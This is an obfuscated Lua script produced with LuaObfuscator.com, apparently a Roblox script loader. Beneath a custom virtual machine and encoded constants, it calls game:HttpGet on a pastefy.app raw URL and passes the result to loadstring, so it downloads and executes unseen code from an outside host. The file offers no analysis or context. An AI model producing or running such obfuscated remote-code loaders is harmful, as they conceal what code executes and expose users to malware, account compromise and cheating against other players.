--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=v2(v0(v30,16));if v19 then local v115=0;local v116;while true do if (v115==1) then return v116;end if (v115==0) then v116=v5(v89,v19);v19=nil;v115=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(1065 -(68 + 997)) -0 ;local v91;while true do if (v90==(0 -0)) then v91=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-((1839 -(226 + 1044)) -(367 + (286 -85))))) + 1)) ;return v91-(v91%(928 -(214 + 713))) ;end end else local v92=0 + 0 ;local v93;while true do if (v92==(0 + 0)) then v93=2^(v32-(878 -(282 + 595))) ;return (((v31%(v93 + v93))>=v93) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(958 -(892 + 65))) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=1 + (0 -0) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12338840 + 4438376)) + (v41 * ((569773 -309302) -194935)) + (v40 * (724 -(82 + 386))) + v39 ;end if (v38==(0 + (0 -0))) then v39,v40,v41,v42=v1(v16,v18,v18 + ((2166 -1211) -(802 + 149 + 1)) );v18=v18 + (10 -(797 -(368 + 423))) ;v38=1188 -(1069 + 118) ;end end end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(0 -0)) then v44=v23();v45=v23();v43=19 -(10 + 8) ;end if (v43==(11 -8)) then if (v48==(442 -(416 + 26))) then if (v47==0) then return v49 * (0 -0) ;else v48=1 + 0 ;v46=0;end elseif (v48==(3621 -1574)) then return ((v47==(438 -(145 + (1373 -(1020 + 60))))) and (v49 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-(325 + 698) ) * (v46 + (v47/((2 + 0)^(824 -(201 + 571))))) ;end if (v43==(1140 -(116 + 1022))) then v48=v20(v45,87 -66 ,31);v49=((v20(v45,19 + (1436 -(630 + 793)) )==1) and  -(3 -2)) or (3 -(6 -4)) ;v43=3;end if (v43==(860 -(814 + 45))) then v46=2 -1 ;v47=(v20(v45,1 + 0 ,8 + 12 ) * (((4199 -3312) -(261 + 624))^(56 -(10 + 14)))) + v44 ;v43=2;end end end local function v25(v50) local v51;if  not v50 then local v94=0 -0 ;while true do if (v94==(1747 -(760 + 987))) then v50=v23();if (v50==((659 + 1254) -(1789 + 124))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v68=767 -(745 + (57 -36)) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 0 + 0 ;end)();local v96=(function() return;end)();local v98=(function() return;end)();while true do if (v95==(935 -(39 + 896))) then local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (0==v121) then v122=(function() return 0 -0 ;end)();while true do if (v122~=0) then else v96=(function() return v97();end)();v98=(function() return nil;end)();v122=(function() return 1 -0 ;end)();end if (1~=v122) then else v95=(function() return  #"]";end)();break;end end break;end end end if (v95== #"}") then if (v96== #"/") then v98=(function() return v97()~=0 ;end)();elseif (v96==2) then v98=(function() return v99();end)();elseif (v96~= #"91(") then else v98=(function() return v100();end)();end v101[v102]=(function() return v98;end)();break;end end return v95,v96,v97,v98,v99,v100,v101,v102;end;end)();local v54=(function() return function(v103,v104,v105) local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();while true do if (v106==0) then v107=(function() return 0 + 0 ;end)();while true do if (v107==(0 + 0)) then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (v127==(396 -(115 + 281))) then v128=(function() return 0;end)();while true do if (v128~=(0 -0)) then else local v181=(function() return 0 + 0 ;end)();while true do if (v181==(0 -0)) then v103[v104-#"<" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #":",v59 do FlatIdent_287B5,Type,v21,Cons,v24,v25,v60,v70=(function() return v53(FlatIdent_287B5,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"xnx"]=(function() return v21();end)();for v71= #":",v23() do local v72=(function() return v21();end)();if (v20(v72, #"]", #"[")==(867 -(550 + 317))) then local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==(0 -0)) then local v124=(function() return 0;end)();while true do if (v124==0) then local v153=(function() return 0 -0 ;end)();while true do if (v153==(285 -(134 + 151))) then v112=(function() return v20(v72,2, #"19(");end)();v113=(function() return v20(v72, #"0836",1671 -(970 + 695) );end)();v153=(function() return 1 -0 ;end)();end if (v153==(1991 -(582 + 1408))) then v124=(function() return 3 -2 ;end)();break;end end end if (v124==1) then v111=(function() return 1 -0 ;end)();break;end end end if (v111==(7 -5)) then if (v20(v113, #"~", #"{")~= #"/") then else v114[2]=(function() return v60[v114[2]];end)();end if (v20(v113,2,1826 -(1195 + 629) )== #"}") then v114[ #"-19"]=(function() return v60[v114[ #"gha"]];end)();end v111=(function() return 3;end)();end if (v111==1) then local v125=(function() return 0 -0 ;end)();while true do if (v125==(241 -(187 + 54))) then v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==0) then local v156=(function() return 780 -(162 + 618) ;end)();while true do if (v156~=0) then else v114[ #"xnx"]=(function() return v22();end)();v114[ #".dev"]=(function() return v22();end)();break;end end elseif (v112== #" ") then v114[ #"nil"]=(function() return v23();end)();elseif (v112==2) then v114[ #"91("]=(function() return v23() -((2 + 0)^(11 + 5)) ;end)();elseif (v112== #"asd") then local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if ((0 -0)==v186) then v187=(function() return 0 -0 ;end)();while true do if (v187==(0 + 0)) then v114[ #"19("]=(function() return v23() -((1638 -(1373 + 263))^(1016 -(451 + 549))) ;end)();v114[ #".dev"]=(function() return v22();end)();break;end end break;end end end v125=(function() return 1;end)();end if (v125==(1 + 0)) then v111=(function() return 2;end)();break;end end end if (v111~=(4 -1)) then else if (v20(v113, #"asd", #"xnx")~= #"[") then else v114[ #"asd1"]=(function() return v60[v114[ #"0836"]];end)();end v55[v71]=(function() return v114;end)();break;end end end end for v73= #"/",v23() do v56,v73,v28=(function() return v54(v56,v73,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 -0 ];local v66=v62[1386 -((1510 -764) + (703 -(30 + 35))) ];local v67=v62[2 + 0 + 1 ];return function(...) local v74=v65;local v75=v66;local v76=v67;local v77=v27;local v78=1 -0 ;local v79= -(342 -(218 + 123));local v80={};local v81={...};local v82=v12("#",...) -(1 + 0) ;local v83={};local v84={};for v108=0 + 0 ,v82 do if (v108>=v76) then v80[v108-v76 ]=v81[v108 + (561 -(306 + 254)) ];else v84[v108]=v81[v108 + (1258 -(1043 + 214)) + 0 ];end end local v85=(v82-v76) + (1 -(0 -0)) ;local v86;local v87;while true do v86=v74[v78];v87=v86[1468 -(899 + 568) ];if (v87<=(2 + 1)) then if (v87<=1) then if (v87>(0 -0)) then local v132=v86[605 -(268 + (1547 -(323 + 889))) ];v84[v132]=v84[v132](v13(v84,v132 + (291 -((161 -101) + 230)) ,v79));else local v134=v86[574 -(426 + 146) ];local v135=v84[v86[3]];v84[v134 + 1 ]=v135;v84[v134]=v135[v86[1 + 3 ]];end elseif ((v87==(1458 -(282 + 1174))) or (1483==1830)) then local v139=811 -(569 + (822 -(361 + 219))) ;local v140;local v141;local v142;local v143;local v144;while true do if (((5 -3)==v139) or (3082==3612)) then v144=v86[1 + 1 ];v143=v84[v86[1027 -(706 + 318) ]];v84[v144 + (1252 -(721 + 530)) ]=v143;v84[v144]=v143[v86[1275 -(945 + 326) ]];v78=v78 + (2 -1) ;v139=3 + 0 ;end if (v139==1) then v78=v78 + (701 -(271 + 429)) ;v86=v74[v78];v84[v86[2 + 0 ]]=v64[v86[1503 -(1408 + 92) ]];v78=v78 + (1087 -(461 + 625)) ;v86=v74[v78];v139=2;end if ((2460<=3134) and (v139==(1288 -(993 + 295)))) then v140=nil;v141,v142=nil;v143=nil;v144=nil;v84[v86[1 + 1 ]]=v64[v86[1174 -(418 + 753) ]];v139=1;end if ((v139==(2 + 3)) or (3275>=4794)) then v86=v74[v78];v144=v86[1 + 1 ];v84[v144]=v84[v144](v13(v84,v144 + 1 + 0 ,v79));v78=v78 + 1 + 0 ;v86=v74[v78];v139=535 -(406 + 123) ;end if (v139==3) then v86=v74[v78];v84[v86[(2091 -(53 + 267)) -(1749 + 20) ]]=v86[1 + 2 ];v78=v78 + (1323 -(1249 + 73)) ;v86=v74[v78];v144=v86[2];v139=4;end if (4==v139) then v141,v142=v77(v84[v144](v13(v84,v144 + 1 + 0 ,v86[1148 -(466 + 679) ])));v79=(v142 + v144) -(2 -(1 + 0)) ;v140=0 -0 ;for v175=v144,v79 do v140=v140 + 1 ;v84[v175]=v141[v140];end v78=v78 + (1901 -(106 + (2207 -(15 + 398)))) ;v139=(984 -(18 + 964)) + 3 ;end if ((1484==1484) and (v139==(2 + 4))) then v84[v86[2]]();v78=v78 + ((7 -5) -1) ;v86=v74[v78];do return;end break;end end else v84[v86[5 -3 ]]();end elseif (v87<=5) then if ((1432<3555) and (v87>(118 -(4 + 110)))) then v84[v86[2 + 0 ]]=v86[587 -(57 + 527) ];else local v147=v86[1429 -(41 + 1386) ];local v148,v149=v77(v84[v147](v13(v84,v147 + ((66 + 38) -(17 + 86)) ,v86[3 + (850 -(20 + 830)) ])));v79=(v149 + v147) -(1 -(0 + 0)) ;local v150=0 -0 ;for v154=v147,v79 do local v155=0;while true do if ((166 -(122 + 44))==v155) then v150=v150 + ((127 -(116 + 10)) -0) ;v84[v154]=v148[v150];break;end end end end elseif ((v87>6) or (1065>3578)) then v84[v86[6 -4 ]]=v64[v86[3 + 0 ]];else do return;end end v78=v78 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F574E7A43797137772F72617700083Q0012023Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
